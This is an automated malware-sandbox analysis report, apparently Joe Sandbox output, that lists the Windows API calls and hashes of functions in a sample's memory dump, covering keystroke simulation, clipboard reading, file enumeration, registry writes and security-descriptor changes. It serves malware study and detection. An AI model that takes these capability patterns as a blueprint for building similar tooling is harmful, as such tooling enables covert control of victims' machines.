                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCBFF
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CCC40
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCC6A
                                                          • SendMessageW.USER32 ref: 003CCC93
                                                          • _wcsncpy.LIBCMT ref: 003CCCFF
                                                          • GetKeyState.USER32(00000011), ref: 003CCD20
                                                          • GetKeyState.USER32(00000009), ref: 003CCD2D
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCD43
                                                          • GetKeyState.USER32(00000010), ref: 003CCD4D
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCD76
                                                          • SendMessageW.USER32 ref: 003CCD9D
                                                          • SendMessageW.USER32(?,00001030,?,003CB37C), ref: 003CCEA1
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003CCEB7
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003CCECA
                                                          • SetCapture.USER32(?), ref: 003CCED3
                                                          • ClientToScreen.USER32(?,?), ref: 003CCF38
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003CCF45
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003CCF5F
                                                          • ReleaseCapture.USER32 ref: 003CCF6A
                                                          • GetCursorPos.USER32(?), ref: 003CCFA4
                                                          • ScreenToClient.USER32(?,?), ref: 003CCFB1
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD00D
                                                          • SendMessageW.USER32 ref: 003CD03B
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD078
                                                          • SendMessageW.USER32 ref: 003CD0A7
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003CD0C8
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003CD0D7
                                                          • GetCursorPos.USER32(?), ref: 003CD0F7
                                                          • ScreenToClient.USER32(?,?), ref: 003CD104
                                                          • GetParent.USER32(?), ref: 003CD124
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD18D
                                                          • SendMessageW.USER32 ref: 003CD1BE
                                                          • ClientToScreen.USER32(?,?), ref: 003CD21C
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003CD24C
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD276
                                                          • SendMessageW.USER32 ref: 003CD299
                                                          • ClientToScreen.USER32(?,?), ref: 003CD2EB
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003CD31F
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CD3BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F$pb@
                                                          • API String ID: 3977979337-1958197849
                                                          • Opcode ID: 0294f528465d0d77e2e03a82a786cef774ba115209287f09a9fb9c1219d7c776
                                                          • Instruction ID: 9b339d4a96612d0572ed5aeb365ca815e96ad3e750effb315e51775566d4bdab
                                                          • Opcode Fuzzy Hash: 0294f528465d0d77e2e03a82a786cef774ba115209287f09a9fb9c1219d7c776
                                                          • Instruction Fuzzy Hash: CE426A35204241AFDB22DF64C849FAABBE9FF49310F15492DF599DB2A1C732AC50CB52
                                                          Function 003570FE Relevance: 54.0, APIs: 19, Strings: 9, Instructions: 5018COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: ]?$DEFINE$Oa5$P\?$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                          • API String ID: 1357608183-1541983792
                                                          • Opcode ID: 633d91636970eff3c1fd1f63a5fbf90fb95ad7b1e08f3d989fc863b25625e52b
                                                          • Instruction ID: cd13456a55d8d2cca191a1f5d20044d7c0b46d48acf4fa8258b30e2bb8eda814
                                                          • Opcode Fuzzy Hash: 633d91636970eff3c1fd1f63a5fbf90fb95ad7b1e08f3d989fc863b25625e52b
                                                          • Instruction Fuzzy Hash: 9993A075A00219DFDF26CF98D881BADB7B1FF48710F25856AE945EB290E7709E81CB40
                                                          Function 00344A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00344A3D
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0037D9BE
                                                          • IsIconic.USER32(?), ref: 0037D9C7
                                                          • ShowWindow.USER32(?,00000009), ref: 0037D9D4
                                                          • SetForegroundWindow.USER32(?), ref: 0037D9DE
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037D9F4
                                                          • GetCurrentThreadId.KERNEL32 ref: 0037D9FB
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037DA07
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037DA18
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037DA20
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0037DA28
                                                          • SetForegroundWindow.USER32(?), ref: 0037DA2B
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA40
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA4B
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA55
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA5A
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA63
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA68
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA72
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA77
                                                          • SetForegroundWindow.USER32(?), ref: 0037DA7A
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0037DAA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: b451cce4425ab3fc1eb655999f8d4c91fb19fd9c5e6c7fbe4fcbe59facfa9e0a
                                                          • Instruction ID: 9c186a9bc161b428a2dd222e184f8b731d49273e7b1f4d68e4dff298a0169551
                                                          • Opcode Fuzzy Hash: b451cce4425ab3fc1eb655999f8d4c91fb19fd9c5e6c7fbe4fcbe59facfa9e0a
                                                          • Instruction Fuzzy Hash: AF315271A40318BEEB326F619C49F7E7E6DEF45B50F114025FA05EA190C6B46D11ABA0
                                                          Function 003B407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32(003CF910), ref: 003B40A6
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 003B40B4
                                                          • GetClipboardData.USER32(0000000D), ref: 003B40BC
                                                          • CloseClipboard.USER32 ref: 003B40C8
                                                          • GlobalLock.KERNEL32(00000000), ref: 003B40E4
                                                          • CloseClipboard.USER32 ref: 003B40EE
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003B4103
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 003B4110
                                                          • GetClipboardData.USER32(00000001), ref: 003B4118
                                                          • GlobalLock.KERNEL32(00000000), ref: 003B4125
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003B4159
                                                          • CloseClipboard.USER32 ref: 003B4269
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: f8957db3d1598392c3002ed8950e9a6fae2ce41e9abc84a09d89991afef1b2b1
                                                          • Instruction ID: d17f71c86aac85aa663ced5a5f8194a49e3a158ec8c5a168de96d325e6e61dfd
                                                          • Opcode Fuzzy Hash: f8957db3d1598392c3002ed8950e9a6fae2ce41e9abc84a09d89991afef1b2b1
                                                          • Instruction Fuzzy Hash: 7F51AF35204305AFD313BF64DC85FAE77ADAF84B05F004529F686DA1A2DF70E9058B66
                                                          Function 003AC7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003AC819
                                                          • FindClose.KERNEL32(00000000), ref: 003AC86D
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC892
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC8A9
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003AC8D0
                                                          • __swprintf.LIBCMT ref: 003AC91C
                                                          • __swprintf.LIBCMT ref: 003AC95F
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • __swprintf.LIBCMT ref: 003AC9B3
                                                            • Part of subcall function 00363818: __woutput_l.LIBCMT ref: 00363871
                                                          • __swprintf.LIBCMT ref: 003ACA01
                                                            • Part of subcall function 00363818: __flsbuf.LIBCMT ref: 00363893
                                                            • Part of subcall function 00363818: __flsbuf.LIBCMT ref: 003638AB
                                                          • __swprintf.LIBCMT ref: 003ACA50
                                                          • __swprintf.LIBCMT ref: 003ACA9F
                                                          • __swprintf.LIBCMT ref: 003ACAEE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 344cd80e28cca87400b2c10d4a7cfb0b09381905fb25d093f76d6df1d79de138
                                                          • Instruction ID: e5ec2eb7718f2c0566c214d7612039b9072c4830f64b148846ba47ba19ef24d9
                                                          • Opcode Fuzzy Hash: 344cd80e28cca87400b2c10d4a7cfb0b09381905fb25d093f76d6df1d79de138
                                                          • Instruction Fuzzy Hash: 81A110B1418305ABC716EB54C886EAFB7ECFF95704F40491AF595CB191EB34EA08CB62
                                                          Function 003AF021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003AF042
                                                          • _wcscmp.LIBCMT ref: 003AF057
                                                          • _wcscmp.LIBCMT ref: 003AF06E
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003AF080
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 003AF09A
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003AF0B2
                                                          • FindClose.KERNEL32(00000000), ref: 003AF0BD
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF0D9
                                                          • _wcscmp.LIBCMT ref: 003AF100
                                                          • _wcscmp.LIBCMT ref: 003AF117
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF129
                                                          • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF147
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF151
                                                          • FindClose.KERNEL32(00000000), ref: 003AF15E
                                                          • FindClose.KERNEL32(00000000), ref: 003AF170
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 0c78464077f6da4d0eddfb950f7a800ab541a905d5b23d691751fe506d0dbbb0
                                                          • Instruction ID: 896e97b366723f2fe9f358e4c593ac06553202c51991578d5bb882125dceae37
                                                          • Opcode Fuzzy Hash: 0c78464077f6da4d0eddfb950f7a800ab541a905d5b23d691751fe506d0dbbb0
                                                          • Instruction Fuzzy Hash: B531BF76500219AEDB12EBB4DC89EEE77ACDF4A320F104175E805E31A0EB70EE45CB64
                                                          Function 003C08E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C09DE
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CF910,00000000,?,00000000,?,?), ref: 003C0A4C
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003C0A94
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003C0B1D
                                                          • RegCloseKey.ADVAPI32(?), ref: 003C0E3D
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0E4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 8120dbdc7caff31b3302f16620e6b708f3267e8ac4dda85adb0e19ec424c8873
                                                          • Instruction ID: 88b0a5c187cc25999ee1e349ea5954de9938a3db331e512b29bc4274d06a2330
                                                          • Opcode Fuzzy Hash: 8120dbdc7caff31b3302f16620e6b708f3267e8ac4dda85adb0e19ec424c8873
                                                          • Instruction Fuzzy Hash: DF0225752046519FCB16EF24C895E2AB7E9AF88714F05885DF89A9F362CB30ED04CB81
                                                          Function 00356841 Relevance: 24.6, Strings: 19, Instructions: 889COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0D>$0E>$0F>$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa5$UCP)$UTF)$UTF16)$pG>
                                                          • API String ID: 0-1832422051
                                                          • Opcode ID: e21bd53beea1013bf31a40498eab49bee714273033f0fe63c33f865bd107647c
                                                          • Instruction ID: f6e45edc104555b50deea9be2ffe1b75adb0bb1053f43164f3793ac7e43a02b9
                                                          • Opcode Fuzzy Hash: e21bd53beea1013bf31a40498eab49bee714273033f0fe63c33f865bd107647c
                                                          • Instruction Fuzzy Hash: 3C727075E0021A9BDF26CF59C841BAEB7F5FF48310F55816AE805EB690EB309D45CB90
                                                          Function 003AF17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003AF19F
                                                          • _wcscmp.LIBCMT ref: 003AF1B4
                                                          • _wcscmp.LIBCMT ref: 003AF1CB
                                                            • Part of subcall function 003A43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003A43E1
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003AF1FA
                                                          • FindClose.KERNEL32(00000000), ref: 003AF205
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF221
                                                          • _wcscmp.LIBCMT ref: 003AF248
                                                          • _wcscmp.LIBCMT ref: 003AF25F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF271
                                                          • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF28F
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF299
                                                          • FindClose.KERNEL32(00000000), ref: 003AF2A6
                                                          • FindClose.KERNEL32(00000000), ref: 003AF2B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: c35a5bf9ac5e15855553bf0ce6c8fbec50b571dfe83dfc52a43b23e0b62f5ebc
                                                          • Instruction ID: 33531ccea6fd2abd28dd9682f5910ec1a9b34e01e59551bf4d3200db9bfc6419
                                                          • Opcode Fuzzy Hash: c35a5bf9ac5e15855553bf0ce6c8fbec50b571dfe83dfc52a43b23e0b62f5ebc
                                                          • Instruction Fuzzy Hash: 2C31CE3A9002196ECB22ABA4EC88FEE73ADDF46324F104675E800E31A0DB70DE45CB54
                                                          Function 003AA279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003AA299
                                                          • __swprintf.LIBCMT ref: 003AA2BB
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003AA2F8
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003AA31D
                                                          • _memset.LIBCMT ref: 003AA33C
                                                          • _wcsncpy.LIBCMT ref: 003AA378
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003AA3AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 003AA3B8
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003AA3C1
                                                          • CloseHandle.KERNEL32(00000000), ref: 003AA3CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 3fdb793d47d7c2c1313ff2b59e416555d0c500aa4cfbf39477ef49e9fc852e3e
                                                          • Instruction ID: 04daeebb2ed8f19010c736268f73ece76e0ea68df65b941aa3c0b8d80936a2de
                                                          • Opcode Fuzzy Hash: 3fdb793d47d7c2c1313ff2b59e416555d0c500aa4cfbf39477ef49e9fc852e3e
                                                          • Instruction Fuzzy Hash: A131C3B6500109ABDB22DFA0DC49FEB77BDEF89700F1041B6F908D60A0E774A644CB24
                                                          Function 003981D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0039852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00398546
                                                            • Part of subcall function 0039852A: GetLastError.KERNEL32(?,0039800A,?,?,?), ref: 00398550
                                                            • Part of subcall function 0039852A: GetProcessHeap.KERNEL32(00000008,?,?,0039800A,?,?,?), ref: 0039855F
                                                            • Part of subcall function 0039852A: HeapAlloc.KERNEL32(00000000,?,0039800A,?,?,?), ref: 00398566
                                                            • Part of subcall function 0039852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039857D
                                                            • Part of subcall function 003985C7: GetProcessHeap.KERNEL32(00000008,00398020,00000000,00000000,?,00398020,?), ref: 003985D3
                                                            • Part of subcall function 003985C7: HeapAlloc.KERNEL32(00000000,?,00398020,?), ref: 003985DA
                                                            • Part of subcall function 003985C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00398020,?), ref: 003985EB
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00398238
                                                          • _memset.LIBCMT ref: 0039824D
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0039826C
                                                          • GetLengthSid.ADVAPI32(?), ref: 0039827D
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003982BA
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003982D6
                                                          • GetLengthSid.ADVAPI32(?), ref: 003982F3
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00398302
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398309
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0039832A
                                                          • CopySid.ADVAPI32(00000000), ref: 00398331
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00398362
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00398388
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0039839C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 7528058ec5eef340f06f230257d120f23bb65ba7371448135322245ab5fff8d6
                                                          • Instruction ID: 6af77d518fa14db06d672fc8b60d6e50bc5667870e17c4d35429016608401698
                                                          • Opcode Fuzzy Hash: 7528058ec5eef340f06f230257d120f23bb65ba7371448135322245ab5fff8d6
